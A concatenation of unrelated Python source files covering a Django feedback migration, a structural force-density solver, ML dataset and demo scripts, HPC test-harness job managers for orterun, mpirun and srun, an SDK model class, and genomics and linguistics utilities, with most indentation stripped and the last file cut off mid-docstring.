'permissions': (('view_textanswer', 'View TextAnswer'),),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='TextQuestion',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('order', models.SmallIntegerField(default=10, verbose_name='Rekkef\xf8lge')),
('label', models.CharField(max_length=256, verbose_name='Sp\xf8rsm\xe5l')),
('display', models.BooleanField(default=True, verbose_name='Vis til bedrift')),
('feedback', models.ForeignKey(related_name='text_questions', to='feedback.Feedback')),
],
options={
'permissions': (('view_textquestion', 'View TextQuestion'),),
},
bases=(models.Model,),
),
migrations.AddField(
model_name='textanswer',
name='question',
field=models.ForeignKey(related_name='answer', to='feedback.TextQuestion'),
preserve_default=True,
),
migrations.AddField(
model_name='ratinganswer',
name='question',
field=models.ForeignKey(related_name='answer', to='feedback.RatingQuestion'),
preserve_default=True,
),
migrations.AddField(
model_name='multiplechoiceanswer',
name='question',
field=models.ForeignKey(related_name='answer', to='feedback.MultipleChoiceRelation'),
preserve_default=True,
),
migrations.AlterUniqueTogether(
name='feedbackrelation',
unique_together=set([('feedback', 'content_type', 'object_id')]),
),
migrations.AddField(
model_name='choice',
name='question',
field=models.ForeignKey(related_name='choices', to='feedback.MultipleChoiceQuestion'),
preserve_default=True,
),
]
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from copy import deepcopy
from compas.geometry import cross_vectors
from compas.geometry import subtract_vectors
from compas.geometry import length_vector
from compas.geometry import centroid_points
from compas.geometry import norm_vector
from compas_tna.equilibrium._alglib._core import xalglib
__all__ = ['vertical_from_q_alglib']
def vertical_from_q_alglib(form, scale=1.0, density=1.0, kmax=100, tol=1e-3):
""""""
key_index = form.key_index()
xyz = form.vertices_attributes('xyz')
loads = form.vertices_attributes(('px', 'py', 'pz'))
n = form.number_of_vertices()
fixed = list(set(list(form.anchors()) + list(form.fixed())))
free = list(set(range(n)) - set(fixed))
ni = len(free)
nf = len(fixed)
xyzf = [xyz[i] for i in fixed]
selfweight = selfweight_calculator(form, density=density)
adjacency = {}
for key in form.vertices():
nbrs = form.vertex_neighbors(key)
adj = [key_index[nbr] for nbr in nbrs if form.edge_attribute((key, nbr), '_is_edge')]
adjacency[key_index[key]] = adj
ij_q = {uv: scale * form.edge_attribute(uv, 'q', 1.0) for uv in form.edges_where({'_is_edge': True})}
ij_q.update({(v, u): q for (u, v), q in ij_q.items()})
ij_q = {(key_index[u], key_index[v]): ij_q[u, v] for u, v in ij_q}
nonzero_fixed, nonzero_free = nonzero(adjacency, fixed, free)
CtQC = xalglib.sparsecreate(n, n)
CitQCi = xalglib.sparsecreate(ni, ni)
CitQCf = xalglib.sparsecreate(ni, nf)
solver = xalglib.linlsqrcreate(ni, ni)
update_matrices(adjacency, free, nonzero_fixed, nonzero_free, CtQC, CitQCf, CitQCi, ij_q)
update_z(solver, xyz, xyzf, free, CtQC, CitQCf, CitQCi, selfweight=selfweight, kmax=kmax, tol=tol)
p = deepcopy(loads)
sw = selfweight(xyz)
for i in range(len(p)):
p[i][2] -= sw[i]
rx, ry, rz = compute_residuals(xyz, p, n, CtQC)
for key in form.vertices():
index = key_index[key]
form.vertex_attributes(key, 'xyz', xyz[index])
form.vertex_attributes(key, 'rx', rx[index])
form.vertex_attributes(key, 'ry', ry[index])
form.vertex_attributes(key, 'rz', rz[index])
    for u, v in form.edges():
        q = scale * form.edge_attribute((u, v), 'q')
        l = form.edge_length(u, v)
        f = q * l
        form.edge_attributes((u, v), ('f', 'l'), (f, l))
# ==============================================================================
# helpers
# ==============================================================================
def selfweight_calculator(form, density=1.0):
key_index = form.key_index()
sw = [0] * form.number_of_vertices()
rho = [attr['t'] * density for key, attr in form.vertices(True)]
def calculate_selfweight(xyz):
fkey_centroid = {fkey: form.face_centroid(fkey) for fkey in form.faces() if form.face_attribute(fkey, '_is_loaded')}
for u in form.vertices():
i = key_index[u]
p0 = xyz[i]
area = 0
for v in form.halfedge[u]:
j = key_index[v]
p01 = subtract_vectors(xyz[j], p0)
fkey = form.halfedge[u][v]
if fkey in fkey_centroid:
p02 = subtract_vectors(fkey_centroid[fkey], p0)
area += length_vector(cross_vectors(p01, p02))
fkey = form.halfedge[v][u]
if fkey in fkey_centroid:
p03 = subtract_vectors(fkey_centroid[fkey], p0)
area += length_vector(cross_vectors(p01, p03))
sw[i] = 0.25 * area * rho[i]
return sw
return calculate_selfweight
def nonzero(adjacency, fixed, free):
n = len(adjacency)
j_col_free = {value: index for index, value in enumerate(free)}
j_col_fixed = {value: index for index, value in enumerate(fixed)}
i_nonzero_free = {i: [] for i in range(n)}
i_nonzero_fixed = {i: [] for i in range(n)}
fixed = set(fixed)
for i in range(n):
if i in fixed:
i_nonzero_fixed[i].append((i, j_col_fixed[i]))
else:
i_nonzero_free[i].append((i, j_col_free[i]))
for j in adjacency[i]:
if j in fixed:
i_nonzero_fixed[i].append((j, j_col_fixed[j]))
else:
i_nonzero_free[i].append((j, j_col_free[j]))
return i_nonzero_fixed, i_nonzero_free
def update_matrices(adjacency, free, nonzero_fixed, nonzero_free, CtQC, CitQCf, CitQCi, ij_q):
xalglib.sparseconverttohash(CtQC)
xalglib.sparseconverttohash(CitQCi)
xalglib.sparseconverttohash(CitQCf)
n = len(adjacency)
ni = len(free)
for i in range(n):
Q = 0
for j in adjacency[i]:
q = ij_q[(i, j)]
Q += q
xalglib.sparseset(CtQC, i, j, -q)
xalglib.sparseset(CtQC, i, i, Q)
for row in range(ni):
i = free[row]
for j, col in nonzero_fixed[i]:
xalglib.sparseset(CitQCf, row, col, xalglib.sparseget(CtQC, i, j))
for j, col in nonzero_free[i]:
xalglib.sparseset(CitQCi, row, col, xalglib.sparseget(CtQC, i, j))
def update_z(solver, xyz, xyzf, free, CtQC, CitQCf, CitQCi, selfweight, tol=1e-3, kmax=100):
# solve A.x = b
# with A = CitQCi
# b = pzi - CitQCf.zf
# x = zi
xalglib.sparseconverttocrs(CitQCi)
xalglib.sparseconverttocrs(CitQCf)
xalglib.sparseconverttocrs(CtQC)
n = len(xyz)
ni = len(free)
z = [z for _, _, z in xyz]
zf = [z for _, _, z in xyzf]
A = CitQCi
b_ = xalglib.sparsemv(CitQCf, zf, [0] * ni)
out = [0] * n
for k in range(kmax):
sw = selfweight(xyz)
        b = [- sw[free[i]] - b_[i] for i in range(ni)]
xalglib.linlsqrsolvesparse(solver, A, b)
zi, _ = xalglib.linlsqrresults(solver)
for i in range(ni):
z[free[i]] = zi[i]
rz = xalglib.sparsemv(CtQC, z, out)
        rz = [- sw[i] - rz[i] for i in range(n)]
        residual = norm_vector([rz[free[i]] for i in range(ni)])
if residual < tol:
break
for i in range(ni):
xyz[free[i]][2] = zi[i]
return residual
def compute_residuals(xyz, p, n, CtQC):
# residual = CtQC.xyz - p
xalglib.sparseconverttocrs(CtQC)
x, y, z = zip(*xyz)
x = list(x)
y = list(y)
z = list(z)
out = [0] * n
rx = xalglib.sparsemv(CtQC, x, out)
rx = [p[i][0] - rx[i] for i in range(n)]
ry = xalglib.sparsemv(CtQC, y, out)
ry = [p[i][1] - ry[i] for i in range(n)]
rz = xalglib.sparsemv(CtQC, z, out)
rz = [p[i][2] - rz[i] for i in range(n)]
return rx, ry, rz
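# Hedged usage sketch (assumes a compas_tna FormDiagram with force densities 'q',
# vertex thicknesses 't' and anchors already defined; the file name is hypothetical):
#
#     from compas_tna.diagrams import FormDiagram
#     form = FormDiagram.from_json('form.json')
#     vertical_from_q_alglib(form, scale=1.0, density=1.0)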
# ==============================================================================
# Main
# ==============================================================================
if __name__ == "__main__":
pass
|
from .builder import build_dataset
from .cityscapes import CityscapesDataset
from .coco import CocoDataset
from .custom import CustomDataset
from .dataset_wrappers import ConcatDataset, RepeatDataset
from .loader import DistributedGroupSampler, GroupSampler, build_dataloader
from .registry import DATASETS
from .voc import VOCDataset
from .wider_face import WIDERFaceDataset
from .xml_style import XMLDataset
from .future_dataset import FutureDataset
__all__ = [
'CustomDataset', 'XMLDataset', 'CocoDataset', 'VOCDataset',
'CityscapesDataset', 'GroupSampler', 'DistributedGroupSampler',
'build_dataloader', 'ConcatDataset', 'RepeatDataset', 'WIDERFaceDataset',
'DATASETS', 'build_dataset', 'FutureDataset'
]
|
from anuvaad_auditor.loghandler import log_info, log_exception
from utilities import MODULE_CONTEXT
def logs_book(entity,value,message):
'''
    Logs a specific entity and value, together with a message, to keep track of processing at various stages
'''
try:
log_info("{} || {} || {}".format(entity,value,message),MODULE_CONTEXT)
except Exception as e:
log_exception("Exception caught in logs_book {}".format(e),MODULE_CONTEXT,e)
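# Hedged usage sketch (the entity and value names below are illustrative only):
#
#     logs_book("record_id", record_id, "translation completed")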
|
#!/usr/bin/python
"""
(C) Copyright 2020 Intel Corporation.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE
The Government's rights to use, modify, reproduce, release, perform, display,
or disclose this software are subject to the terms of the Apache License as
provided in Contract No. B609815.
Any reproduction of computer software, computer software documentation, or
portions thereof marked with this legend must also reproduce the markings.
"""
from distutils.spawn import find_executable
import os
from command_utils import ExecutableCommand
from command_utils_base import FormattedParameter, EnvironmentVariables
from env_modules import load_mpi
from write_host_file import write_host_file
class JobManager(ExecutableCommand):
"""A class for commands with parameters that manage other commands."""
def __init__(self, namespace, command, job, path="", subprocess=False):
"""Create a JobManager object.
Args:
namespace (str): yaml namespace (path to parameters)
command (str): string of the command to be executed.
job (ExecutableCommand): command object to manage.
path (str, optional): path to location of command binary file.
Defaults to "".
subprocess (bool, optional): whether the command is run as a
subprocess. Defaults to False.
"""
super(JobManager, self).__init__(namespace, command, path, subprocess)
self.job = job
def __str__(self):
"""Return the command with all of its defined parameters as a string.
Returns:
str: the command with all the defined parameters
"""
commands = [super(JobManager, self).__str__(), str(self.job)]
return " ".join(commands)
def check_subprocess_status(self, sub_process):
"""Verify command status when called in a subprocess.
Args:
sub_process (process.SubProcess): subprocess used to run the command
Returns:
bool: whether or not the command progress has been detected
"""
return self.job.check_subprocess_status(sub_process)
# deprecated: Use assign_[hosts|processes|environment]() methods instead
def setup_command(self, env, hostfile, processes):
"""Set up the job manager command with common inputs.
Args:
env (EnvironmentVariables): the environment variables to use with
the launch command
hostfile (str): file defining host names and slots
processes (int): number of host processes
"""
pass
def assign_hosts(self, hosts, path=None, slots=None):
"""Assign the hosts to use with the command.
Set the appropriate command line parameter with the specified value.
Args:
hosts (list): list of hosts to specify on the command line
path (str, optional): path to use when specifying the hosts through
a hostfile. Defaults to None.
slots (int, optional): number of slots per host to specify in the
optional hostfile. Defaults to None.
"""
pass
def assign_processes(self, processes):
"""Assign the number of processes per node.
Set the appropriate command line parameter with the specified value.
Args:
processes (int): number of processes per node
"""
pass
def assign_environment(self, env_vars, append=False):
"""Assign or add environment variables to the command.
Args:
env_vars (EnvironmentVariables): the environment variables to use
assign or add to the command
append (bool): whether to assign (False) or append (True) the
specified environment variables
"""
pass
def assign_environment_default(self, env_vars):
"""Assign the default environment variables for the command.
Args:
env_vars (EnvironmentVariables): the environment variables to
assign as the default
"""
pass
class Orterun(JobManager):
"""A class for the orterun job manager command."""
def __init__(self, job, subprocess=False):
"""Create a Orterun object.
Args:
job (ExecutableCommand): command object to manage.
subprocess (bool, optional): whether the command is run as a
subprocess. Defaults to False.
"""
load_mpi("openmpi")
path = os.path.dirname(find_executable("orterun"))
super(Orterun, self).__init__(
"/run/orterun", "orterun", job, path, subprocess)
# Default mca values to avoid queue pair errors
mca_default = {
"btl_openib_warn_default_gid_prefix": "0",
"btl": "tcp,self",
"oob": "tcp",
"pml": "ob1",
}
self.hostfile = FormattedParameter("--hostfile {}", None)
self.processes = FormattedParameter("--np {}", 1)
self.display_map = FormattedParameter("--display-map", False)
self.map_by = FormattedParameter("--map-by {}", "node")
self.export = FormattedParameter("-x {}", None)
self.enable_recovery = FormattedParameter("--enable-recovery", True)
self.report_uri = FormattedParameter("--report-uri {}", None)
self.allow_run_as_root = FormattedParameter("--allow-run-as-root", None)
self.mca = FormattedParameter("--mca {}", mca_default)
self.pprnode = FormattedParameter("--map-by ppr:{}:node", None)
self.tag_output = FormattedParameter("--tag-output", True)
self.ompi_server = FormattedParameter("--ompi-server {}", None)
# deprecated: Use assign_[hosts|processes|environment]() methods instead
def setup_command(self, env, hostfile, processes):
"""Set up the orterun command with common inputs.
Args:
env (EnvironmentVariables): the environment variables to use with
the launch command
hostfile (str): file defining host names and slots
processes (int): number of host processes
"""
# Setup the env for the job to export with the orterun command
if self.export.value is None:
self.export.value = []
self.export.value.extend(env.get_list())
# Setup the orterun command
self.hostfile.value = hostfile
self.processes.value = processes
def assign_hosts(self, hosts, path=None, slots=None):
"""Assign the hosts to use with the command (--hostfile).
Args:
hosts (list): list of hosts to specify in the hostfile
path (str, optional): hostfile path. Defaults to None.
slots (int, optional): number of slots per host to specify in the
hostfile. Defaults to None.
"""
kwargs = {"hostlist": hosts, "slots": slots}
if path is not None:
kwargs["path"] = path
self.hostfile.value = write_host_file(**kwargs)
def assign_processes(self, processes):
"""Assign the number of processes per node (-np).
Args:
processes (int): number of processes per node
"""
self.processes.value = processes
def assign_environment(self, env_vars, append=False):
"""Assign or add environment variables to the command.
Args:
env_vars (EnvironmentVariables): the environment variables to use
assign or add to the command
append (bool): whether to assign (False) or append (True) the
specified environment variables
"""
if append and self.export.value is not None:
# Convert the current list of environmental variable assignments
# into an EnvironmentVariables (dict) object. Then update the
# dictionary keys with the specified values or add new key value
# pairs to the dictionary. Finally convert the updated dictionary
# back to a list for the parameter assignment.
original = EnvironmentVariables({
item.split("=")[0]: item.split("=")[1] if "=" in item else None
for item in self.export.value})
original.update(env_vars)
self.export.value = original.get_list()
else:
# Overwrite the environmental variable assignment
self.export.value = env_vars.get_list()
def assign_environment_default(self, env_vars):
"""Assign the default environment variables for the command.
Args:
env_vars (EnvironmentVariables): the environment variables to
assign as the default
"""
self.export.update_default(env_vars.get_list())
def run(self):
"""Run the orterun command.
Raises:
CommandFailure: if there is an error running the command
"""
load_mpi("openmpi")
return super(Orterun, self).run()
class Mpirun(JobManager):
"""A class for the mpirun job manager command."""
def __init__(self, job, subprocess=False, mpitype="openmpi"):
"""Create a Mpirun object.
Args:
job (ExecutableCommand): command object to manage.
subprocess (bool, optional): whether the command is run as a
subprocess. Defaults to False.
"""
load_mpi(mpitype)
path = os.path.dirname(find_executable("mpirun"))
super(Mpirun, self).__init__(
"/run/mpirun", "mpirun", job, path, subprocess)
self.hostfile = FormattedParameter("-hostfile {}", None)
self.processes = FormattedParameter("-np {}", 1)
self.ppn = FormattedParameter("-ppn {}", None)
self.envlist = FormattedParameter("-envlist {}", None)
self.mpitype = mpitype
# deprecated: Use assign_[hosts|processes|environment]() methods instead
def setup_command(self, env, hostfile, processes):
"""Set up the mpirun command with common inputs.
Args:
env (EnvironmentVariables): the environment variables to use with
the launch command
hostfile (str): file defining host names and slots
processes (int): number of host processes
"""
# Setup the env for the job to export with the mpirun command
self._pre_command = env.get_export_str()
# Setup the orterun command
self.hostfile.value = hostfile
self.processes.value = processes
def assign_hosts(self, hosts, path=None, slots=None):
"""Assign the hosts to use with the command (-f).
Args:
hosts (list): list of hosts to specify in the hostfile
path (str, optional): hostfile path. Defaults to None.
slots (int, optional): number of slots per host to specify in the
hostfile. Defaults to None.
"""
kwargs = {"hostlist": hosts, "slots": slots}
if path is not None:
kwargs["path"] = path
self.hostfile.value = write_host_file(**kwargs)
def assign_processes(self, processes):
"""Assign the number of processes per node (-np).
Args:
processes (int): number of processes per node
"""
self.processes.value = processes
def assign_environment(self, env_vars, append=False):
"""Assign or add environment variables to the command.
Args:
env_vars (EnvironmentVariables): the environment variables to use
assign or add to the command
append (bool): whether to assign (False) or append (True) the
specified environment variables
"""
if append and self.envlist.value is not None:
# Convert the current list of environmental variable assignments
# into an EnvironmentVariables (dict) object. Then update the
# dictionary keys with the specified values or add new key value
# pairs to the dictionary. Finally convert the updated dictionary
# back to a string for the parameter assignment.
original = EnvironmentVariables({
item.split("=")[0]: item.split("=")[1] if "=" in item else None
for item in self.envlist.value.split(",")})
original.update(env_vars)
self.envlist.value = ",".join(original.get_list())
else:
# Overwrite the environmental variable assignment
self.envlist.value = ",".join(env_vars.get_list())
def assign_environment_default(self, env_vars):
"""Assign the default environment variables for the command.
Args:
env_vars (EnvironmentVariables): the environment variables to
assign as the default
"""
self.envlist.update_default(env_vars.get_list())
def run(self):
"""Run the mpirun command.
Raises:
CommandFailure: if there is an error running the command
"""
load_mpi(self.mpitype)
return super(Mpirun, self).run()
class Srun(JobManager):
"""A class for the srun job manager command."""
def __init__(self, job, path="", subprocess=False):
"""Create a Srun object.
Args:
job (ExecutableCommand): command object to manage.
path (str, optional): path to location of command binary file.
Defaults to "".
subprocess (bool, optional): whether the command is run as a
subprocess. Defaults to False.
"""
super(Srun, self).__init__("/run/srun", "srun", job, path, subprocess)
self.label = FormattedParameter("--label", False)
self.mpi = FormattedParameter("--mpi={}", None)
self.export = FormattedParameter("--export={}", None)
self.ntasks = FormattedParameter("--ntasks={}", None)
self.distribution = FormattedParameter("--distribution={}", None)
self.nodefile = FormattedParameter("--nodefile={}", None)
self.nodelist = FormattedParameter("--nodelist={}", None)
self.ntasks_per_node = FormattedParameter("--ntasks-per-node={}", None)
self.reservation = FormattedParameter("--reservation={}", None)
self.partition = FormattedParameter("--partition={}", None)
self.output = FormattedParameter("--output={}", None)
# deprecated: Use assign_[hosts|processes|environment]() methods instead
def setup_command(self, env, hostfile, processes):
"""Set up the srun command with common inputs.
Args:
env (EnvironmentVariables): the environment variables to use with
the launch command
hostfile (str): file defining host names and slots
processes (int): number of host processes
"""
# Setup the env for the job to export with the srun command
self.export.value = ",".join(["ALL"] + env.get_list())
# Setup the srun command
self.label.value = True
self.mpi.value = "pmi2"
if processes is not None:
self.ntasks.value = processes
self.distribution.value = "cyclic"
if hostfile is not None:
self.nodefile.value = hostfile
def assign_hosts(self, hosts, path=None, slots=None):
"""Assign the hosts to use with the command (-f).
Args:
hosts (list): list of hosts to specify in the hostfile
path (str, optional): hostfile path. Defaults to None.
slots (int, optional): number of slots per host to specify in the
hostfile. Defaults to None.
"""
kwargs = {"hostlist": hosts, "slots": None}
if path is not None:
kwargs["path"] = path
self.nodefile.value = write_host_file(**kwargs)
self.ntasks_per_node.value = slots
def assign_processes(self, processes):
"""Assign the number of processes per node (--ntasks).
Args:
processes (int): number of processes per node
"""
self.ntasks.value = processes
self.distribution.value = "cyclic"
def assign_environment(self, env_vars, append=False):
"""Assign or add environment variables to the command.
Args:
env_vars (EnvironmentVariables): the environment variables to use
assign or add to the command
append (bool): whether to assign (False) or append (True) the
specified environment variables
"""
if append and self.export.value is not None:
# Convert the current list of environmental variable assignments
# into an EnvironmentVariables (dict) object. Then update the
# dictionary keys with the specified values or add new key value
# pairs to the dictionary. Finally convert the updated dictionary
# back to a string for the parameter assignment.
original = EnvironmentVariables({
item.split("=")[0]: item.split("=")[1] if "=" in item else None
for item in self.export.value.split(",")})
original.update(env_vars)
self.export.value = ",".join(original.get_list())
else:
# Overwrite the environmental variable assignment
self.export.value = ",".join(env_vars.get_list())
def assign_environment_default(self, env_vars):
"""Assign the default environment variables for the command.
Args:
env_vars (EnvironmentVariables): the environment variables to
assign as the default
"""
self.export.update_default(env_vars.get_list())
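# Hedged usage sketch (assumes `job` is an ExecutableCommand instance and that the
# host names and environment variable below exist in the test environment):
#
#     manager = Mpirun(job, mpitype="openmpi")
#     manager.assign_hosts(["node-1", "node-2"], path="/tmp", slots=4)
#     manager.assign_processes(8)
#     manager.assign_environment(EnvironmentVariables({"D_LOG_MASK": "INFO"}))
#     manager.run()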
|
#!python
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import util
def test_delete():
util.copy_file('a.txt', 'a.txt.bak')
util.copy_dir('d1', 'd1_bak')
util.delete('a.txt')
util.delete('d1', force=True)
return 'delete OK'
def main():
s = test_delete()
util.send_response('text', s)
main()
|
# coding: utf-8
import pprint
import re
import six
class VersionMediatypes:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'type': 'str',
'base': 'str'
}
attribute_map = {
'type': 'type',
'base': 'base'
}
def __init__(self, type=None, base=None):
"""VersionMediatypes - a model defined in huaweicloud sdk"""
self._type = None
self._base = None
self.discriminator = None
self.type = type
self.base = base
@property
def type(self):
"""Gets the type of this VersionMediatypes.
        Media type.
:return: The type of this VersionMediatypes.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this VersionMediatypes.
        Media type.
:param type: The type of this VersionMediatypes.
:type: str
"""
self._type = type
@property
def base(self):
"""Gets the base of this VersionMediatypes.
        Base type.
:return: The base of this VersionMediatypes.
:rtype: str
"""
return self._base
@base.setter
def base(self, base):
"""Sets the base of this VersionMediatypes.
        Base type.
:param base: The base of this VersionMediatypes.
:type: str
"""
self._base = base
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, VersionMediatypes):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
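# Hedged usage sketch (the media type values below are illustrative only).
if __name__ == "__main__":
    _example = VersionMediatypes(type="application/json", base="application/json")
    print(_example.to_dict())  # {'type': 'application/json', 'base': 'application/json'}
    print(_example == VersionMediatypes(type="application/json", base="application/json"))  # True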
|
#!/usr/bin/env python3
"""
Demonstrates how to chain models, apply masking, and inspect the output of an
intermediate (masking) layer by building a second model that stops at that layer.
"""
import numpy as np
from tensorflow.keras import Input
from tensorflow.keras.layers import Masking, Dense
from tensorflow.keras.regularizers import l2
from tensorflow.keras.models import Sequential, Model
X_train = np.random.rand(4,3,2)
Dense_unit = 1
dense_reg = 0.01
mdl = Sequential()
mdl.add(Input(shape=(X_train.shape[1],X_train.shape[2]),name='input_feature'))
mdl.add(Masking(mask_value=0,name='masking'))
mdl.add(Dense(Dense_unit,kernel_regularizer=l2(dense_reg),activation='relu',name='output_feature'))
mdl.summary()
#this is the same as chaining models
mdl2mask = Model(inputs=mdl.input,outputs=mdl.get_layer("masking").output)
mdl2mask.compile()
mdl.compile()
maskoutput = mdl2mask.predict(X_train)
mdloutput = mdl.predict(X_train)
print(maskoutput) # print output after/of masking
print(mdloutput) # print output of mdl
print(maskoutput.shape) #(4, 3, 2): masking has the shape of the layer before (input here)
print(mdloutput.shape) #(4, 3, 1): shape of the output of dense
|
"""
Calculate coverage statistics, cf. https://github.com/lexibank/abvdoceanic/issues/3
"""
from pathlib import Path
from cltoolkit import Wordlist
from pycldf import Dataset
from pyclts import CLTS
from tabulate import tabulate
from cldfbench.cli_util import with_dataset, get_dataset
def run(args):
path = (Path(__file__).parents[1]).joinpath("cldf/cldf-metadata.json")
# Load data
bipa = CLTS().bipa
wl = Wordlist([ Dataset.from_metadata(path) ], ts=bipa)
# Create coverage table
args.log.info("Creating coverage table...")
table = []
for language in wl.languages:
table += [[language.name, len(language.concepts), len(language.forms_with_sounds),
len(language.sound_inventory.consonants), len(language.sound_inventory.vowels)]]
return tabulate(table, headers=["Name", "Concepts", "Forms", "Consonants", "Vowels"], tablefmt="pipe")
|
import hail as hl
from hail.typecheck import typecheck
from hail.expr.expressions import expr_call, expr_numeric, expr_array, \
check_entry_indexed, check_row_indexed
@typecheck(call_expr=expr_call,
loadings_expr=expr_array(expr_numeric),
af_expr=expr_numeric)
def pc_project(call_expr, loadings_expr, af_expr):
"""Projects genotypes onto pre-computed PCs. Requires loadings and
allele-frequency from a reference dataset (see example). Note that
`loadings_expr` must have no missing data and reflect the rows
from the original PCA run for this method to be accurate.
Example
-------
>>> # Compute loadings and allele frequency for reference dataset
>>> _, _, loadings_ht = hl.hwe_normalized_pca(mt.GT, k=10, compute_loadings=True) # doctest: +SKIP
>>> mt = mt.annotate_rows(af=hl.agg.mean(mt.GT.n_alt_alleles()) / 2) # doctest: +SKIP
>>> loadings_ht = loadings_ht.annotate(af=mt.rows()[loadings_ht.key].af) # doctest: +SKIP
>>> # Project new genotypes onto loadings
>>> ht = pc_project(mt_to_project.GT, loadings_ht.loadings, loadings_ht.af) # doctest: +SKIP
Parameters
----------
call_expr : :class:`.CallExpression`
Entry-indexed call expression for genotypes
to project onto loadings.
loadings_expr : :class:`.ArrayNumericExpression`
Location of expression for loadings
af_expr : :class:`.Float64Expression`
Location of expression for allele frequency
Returns
-------
:class:`.Table`
Table with scores calculated from loadings in column `scores`
"""
check_entry_indexed('pc_project', call_expr)
check_row_indexed('pc_project', loadings_expr)
check_row_indexed('pc_project', af_expr)
gt_source = call_expr._indices.source
loadings_source = loadings_expr._indices.source
af_source = af_expr._indices.source
loadings_expr = _get_expr_or_join(loadings_expr, loadings_source, gt_source, '_loadings')
af_expr = _get_expr_or_join(af_expr, af_source, gt_source, '_af')
mt = gt_source._annotate_all(row_exprs={'_loadings': loadings_expr, '_af': af_expr},
entry_exprs={'_call': call_expr})
if isinstance(loadings_source, hl.MatrixTable):
n_variants = loadings_source.count_rows()
else:
n_variants = loadings_source.count()
mt = mt.filter_rows(hl.is_defined(mt._loadings) & hl.is_defined(mt._af) & (mt._af > 0) & (mt._af < 1))
gt_norm = (mt._call.n_alt_alleles() - 2 * mt._af) / hl.sqrt(n_variants * 2 * mt._af * (1 - mt._af))
return mt.select_cols(scores=hl.agg.array_sum(mt._loadings * gt_norm)).cols()
def _get_expr_or_join(expr, source, other_source, loc):
if source != other_source:
if isinstance(source, hl.MatrixTable):
source = source.annotate_rows(**{loc: expr})
else:
source = source.annotate(**{loc: expr})
expr = source[other_source.row_key][loc]
return expr
|
"""
This demo shows how to use the `experiment` package to log both to `Visdom` and `mlflow`.
"""
from experiment import MLflowExperiment
from experiment import VisdomExperiment
from experiment.visdom import create_parameters_windows, Line, Window
import logging
import mlflow
from traitlets import Enum, Float, Int, Unicode
import time
try:
from tqdm import trange
except ImportError:
trange = range
class Main(MLflowExperiment, VisdomExperiment):
#
# Description of the experiment. Used in the help message.
#
description = Unicode("Demonstration of using Visdom and MLflow logging.")
#
# Parameters of experiment
#
epochs = Int(100, config=True, help="Number of epochs")
lr = Float(0.5, config=True, help="Learning rate of training").tag(parameter=True)
loss_type = Enum(("mse", "l1"), config=True, default_value="mse", help="Loss type.")
def run(self):
"""Running the experiment"""
logging.info("Starting experiment")
logging.info("Using {} loss".format(self.loss_type))
#
# Create the Visdom window and loss plot. The same window can be used for multiple plots.
#
win = Window(env=self.visdom_env, xlabel="epoch", ylabel="Loss", title="Loss")
loss_plot = Line("util", win)
loss = 100
for i in trange(self.epochs):
loss_plot.append(x=i, y=loss)
mlflow.log_metric("loss", loss)
loss = loss * self.lr
#
# Update the properties view window.
#
self.visdom_params_win.update(x=i)
time.sleep(.5)
logging.info("Experiment finished")
if __name__ == "__main__":
main = Main()
main.initialize()
main.start()
|
from typing import Any, Union, Callable
import biorbd_casadi as biorbd
from casadi import horzcat, vertcat, Function, MX, SX
import numpy as np
from .penalty_node import PenaltyNodeList
from ..misc.enums import Node, PlotType, ControlType, ConstraintType, IntegralApproximation
from ..misc.mapping import Mapping, BiMapping
from ..misc.options import OptionGeneric
class PenaltyOption(OptionGeneric):
"""
A placeholder for a penalty
Attributes
----------
node: Node
The node within a phase on which the penalty is acting on
quadratic: bool
If the penalty is quadratic
rows: Union[list, tuple, range, np.ndarray]
The index of the rows in the penalty to keep
cols: Union[list, tuple, range, np.ndarray]
The index of the columns in the penalty to keep
expand: bool
If the penalty should be expanded or not
target: np.array(target)
A target to track for the penalty
target_plot_name: str
The plot name of the target
target_to_plot: np.ndarray
The subset of the target to plot
plot_target: bool
If the target should be plotted
custom_function: Callable
A user defined function to call to get the penalty
node_idx: Union[list, tuple, Node]
The index in nlp to apply the penalty to
dt: float
The delta time
function: Function
The casadi function of the penalty
weighted_function: Function
The casadi function of the penalty weighted
derivative: bool
If the minimization is applied on the numerical derivative of the state [f(t+1) - f(t)]
explicit_derivative: bool
If the minimization is applied to derivative of the penalty [f(t, t+1)]
integration_rule: IntegralApproximation
The integration rule to use for the penalty
transition: bool
If the penalty is a transition
phase_pre_idx: int
The index of the nlp of pre when penalty is transition
phase_post_idx: int
The index of the nlp of post when penalty is transition
constraint_type: ConstraintType
If the penalty is from the user or from bioptim (implicit or internal)
multi_thread: bool
If the penalty is multithreaded
Methods
-------
set_penalty(self, penalty: Union[MX, SX], all_pn: PenaltyNodeList)
Prepare the dimension and index of the penalty (including the target)
_set_dim_idx(self, dim: Union[list, tuple, range, np.ndarray], n_rows: int)
Checks if the variable index is consistent with the requested variable.
_check_target_dimensions(self, all_pn: PenaltyNodeList, n_time_expected: int)
Checks if the variable index is consistent with the requested variable.
